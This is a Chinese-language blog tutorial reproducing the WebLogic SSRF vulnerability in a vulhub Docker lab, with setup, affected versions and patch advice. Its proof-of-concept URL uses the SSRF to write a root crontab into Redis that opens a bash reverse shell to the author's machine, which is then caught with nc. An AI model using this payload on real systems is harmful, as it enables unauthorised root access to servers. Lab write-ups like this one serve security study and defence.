Weblogic-SSRF 漏洞復現


0x01 環境搭建

 

  我這里使用的是vulhub,它幾乎包含了所有的漏洞環境。(建議安裝在ubuntu上)

  有需要的小伙伴來企鵝群自取。

  安裝好vulhub之后需要cd 到weblogic ssrf 目錄下

  然后啟動測試環境

  docker-compose up -d

 

此次環境搭建在Ubuntu上

 

0x02 漏洞簡介

 

Weblogic中存在一個SSRF漏洞,利用該漏洞可以發送任意HTTP請求,進而攻擊內網中redis、fastcgi等脆弱組件。

 

0x03 影響版本

  

weblogic 版本10.0.2

weblogic 版本10.3.6

 

0x04 漏洞復現

 

訪問http://虛擬機-ip:7001/uddiexplorer/

 

 

抓包發送到重放攻擊

 

 

 

 

查看Ubuntu -redis 的ip

然后改包,注意圖中注釋

 

 

Poc:http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.15.131%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

紅色部分為:redis ip

黃色部分為:ubuntu虛擬機 ip

 

然后發包,

 

此時繼續打開Ubuntu 使用nc反彈shell

 

也可以使用其他虛擬機來彈shell,

具體姿勢還沒研究,研究過的小伙伴可以告告我呦

0x05 漏洞修復

 

如果業務不需要UDDI功能,就關閉這個功能。可以刪除uddiexporer文件夾,可以可在/weblogicPath/server/lib/uddiexplorer.war解壓后,注釋掉上面的jsp再打包。

安裝oracle的更新包。http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

 

復現完成之后 

命令:docker-compose down

關閉環境,就OK了

企鵝群:1045867209

歡迎各位表哥

 

博主公眾號

 

 

本文歡迎轉載。 如轉載請務必注明出處。 覺得寫的不錯的可以右側打賞一手。 群在上邊歡迎大家來撩。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM